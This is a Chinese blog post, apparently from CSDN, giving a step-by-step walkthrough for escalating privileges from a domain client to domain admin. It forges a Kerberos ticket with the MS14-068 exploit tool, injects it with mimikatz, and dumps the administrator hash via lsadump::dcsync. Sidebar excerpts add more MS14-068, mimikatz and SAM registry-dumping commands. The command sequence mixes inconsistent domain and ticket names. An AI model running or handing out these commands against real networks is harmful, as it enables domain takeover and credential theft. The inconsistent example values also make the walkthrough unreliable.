域客户机提权获取域hash值

最新推荐文章于 2024-07-11 21:49:06 发布
最新推荐文章于 2024-07-11 21:49:06 发布
阅读量551 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_38378265/article/details/105280470
版权

总步骤:
将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache,然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerberos::ptc TGT_jperesam@sctusr.sctdom.gob.mx.ccache” exit获取票据,然后就可以dir \dc\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域hash值。
一.将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号。

在这里插入图片描述二.再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache
在这里插入图片描述三.然后输入klist purge清除所有的票据
在这里插入图片描述四.再输入mimikatz.exe “kerberos::ptc 你刚刚获取的票据名字” exit获取票据
在这里插入图片描述五. 然后就可以dir \域管计算机名\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域管hash值,或者可以更改administrator获取其他用户的hash值。
在这里插入图片描述在这里插入图片描述
配合“内网渗透的域控制命令”链接使用更方便哦

lidasimida
关注
内网-渗透
qq_32445755的博客
12-13 455
(Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个中,一个中的用户无法访问另一个中的资源)工作组的分散管理模式不适合大型的网络环境下工作,模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和安全策略的计算机集合。中集中存储用户账号的计算机就是控器,中用户账号,计算机账号和安全策略被存储在控制器上一个名为Active Directory的数据库中。
AUTOSAR从入门到精通-【应用篇】面向车载控制器架构的安全FOTA升级方法研究
getusushu的博客
07-25 529
本章概述了汽车E/E架构的发展趋势;介绍了车载DCU的概念、分类及其 架构优势;归纳总结了智能网联汽车FOTA技术的系统架构、升级策略和技术路 线及其安全升级机制;分析提出了面向车载控制器架构的安全FOTA升级需 求来源。现代道路车辆的复杂性正在不断增加,为了保持自身竞争力,汽车必须在功 能和性能上满足用户对于智能化、远距离通信以及即时访问等需求。
用户提权
wuxinweii的博客
11-21 3570
MS14-068漏洞利用 什么是MS14-068漏洞? 在kerberos 协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。 ms14-068 漏洞就是在经过身份验证的Client在TGT中伪造高权限的PAC。 该漏洞允许任何一个普通用户,将自己提升至管理员权限。微软给出的补丁号kb3011780。 MS14-068是非
利用dns特性把普通用户提升到管理员权限
一个码农的笔记
10-17 2852
翻译自:https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 翻译人:聂心明 背景 除了使用自己开发的DNS服务器以外,微软还给这个服务器开发了管理协议,用这个协议可以更方便和更集中的管理控服务器。默认情况下,控服务器也是DNS服务器;DNS服务器几乎可访...
nopac提权
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2740
nopac提权
[讨论]如何在控器上抓用户的HASH
cnbird's blog
12-26 4695
[讨论]如何在控器上抓用户的HASH
ms14-068提权
zz_strive_2012的专栏
06-17 2483
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
渗透常用命令
神隐哥的博客
03-02 1580
信息搜集 net view /domain:XXX 查看XXX中的机器列表 net view /domain 查看内网中有多少个 setspn -T jumbolab.com -Q */* 快速寻找内网中注册的服务 net user /domain 查看用户 net group "domain admins" /domain 查看管 net time /domain 定位控。也可以通过ipconfig /all。一般DNS就是控 nltest /domain_trusts 列出信任关系 c
Cobalt Strike 内渗透
f_carey的博客
01-25 3779
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Cobalt Strike 内渗透1 实验环境1.1 实验拓扑1.2 配置 Win08/Win72 收集内信息2.1 查询当前权限2.2 判断是否存在2.3 查找控制器2.4 查询当前内存活主机2.4.1 利用 windows 内置命令收集2.4.2 利用NetBIOS 探测内网2.4.3 利用 IC.
内网安全 - 横向 PTH&PTK&PTT
acepanhuan的博客
03-16 434
内网安全 - 横向 PTH&PTK&PTT
MS14-068AD提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
环境提权、编辑注册表
zkwniky的博客
09-20 1139
Token(令牌),环境中提权 用户每次登录时,账号绑定临时的token; 访问资源时提交token进行身份验证,类似于web cookie。 Delegate Token:交互会话登录,(例如直接登录、远程桌面登录) Impersonate Token:非交互登录,(例如访问文件共享) 注意:在环境中,Delegate Token账号注销后变成Impersonate Token
如何抓取所有用户的hash(win2008--win2012)
weixin_30763455的博客
06-07 465
如何抓取所有用户的hashgethashes.exe 和gsecdump.exe都直接悲剧,这意味着想要轻量级的抓取所有用户hash已经很难了。在线抓取失败,没办法只能祭出终极武器:离线抓取!第一种办法: vssown.vbs + libesedb + NtdsXtract详细出处参考这里:http://pauldotcom.com/2011/11/safely-dumping-hashes-...
离线提取HASH的方法
weixin_30385925的博客
02-28 744
1、注册表提取 提取文件,Windows Server 2003或者Win XP 及以前需要提升到system权限,以后只要Administrator权限即可。 reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security secruity.hive 本地获取 #如果要提取明文,请修改注册表 ...
内网渗透 - 提权 - Windows
weixin_30855099的博客
08-22 283
MS提权 MS16-135 MS16-016 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫描 跳板机环境分析 1.具备公网IP,所有端口可直接连接,且可访问外网 - 即可使用正向连接,又可以使用反向连接 2.跳板机受...
内网渗透基石篇--权限提升(上)
dzqxwzoe的博客
08-21 915
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。通过网络共享可以访问到GPP的组策略的文件:[外链图片转存中…(img-DRvpkEuv-1692615488651)]打开可以看到存储的cpasword密码:[外链图片转存中…(img-oGGpIxNh-1692615488653)]六、 针对组策略首选项提取的防御措施1.设置共享文件夹SYSVOL的访问权限。
渗透笔记-ADCS 提权-ESC4
NoooEmotion的博客
02-06 988
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
简单的内的提权
最新发布
m0_74326506的博客
07-11 2034
42287:微软规定一台机器的机器账号名以$结尾,但又没有做验证,所以一台机器叫dc的话,可以创建有着机器账户属性的dc账户44278:用dc账户向AS申请TGT票据后,然后去向TGS申请ST,在申请ST的时候删除dc这个账户,那么KDC在验证时就查不到dc这个账户,进而查到dc$这个账户,于是就将ST颁给dc¥这个账户。
Windows最最最常见的几种提权方法
2301_80115097的博客
12-12 1126
Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限。要利用此漏洞,攻击者首先必须登录到系统。
如何通过命令行获取app的hash
07-15
你可以通过以下命令行来获取应用程序的哈希: 在 Windows 上使用 PowerShell: ``` Get-FileHash -Algorithm MD5 <路径/文件名> ``` 在 macOS 和 Linux 上使用 Terminal: ``` md5sum <路径/文件名> ``` 在执行命令时,将 `<路径/文件名>` 替换为应用程序的实际路径和文件名。执行命令后,它将计算应用程序的哈希,并将其显示在命令行界面上。通常,MD5 是最常用的哈希算法之一,但你也可以使用其他算法,如 SHA1、SHA256 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值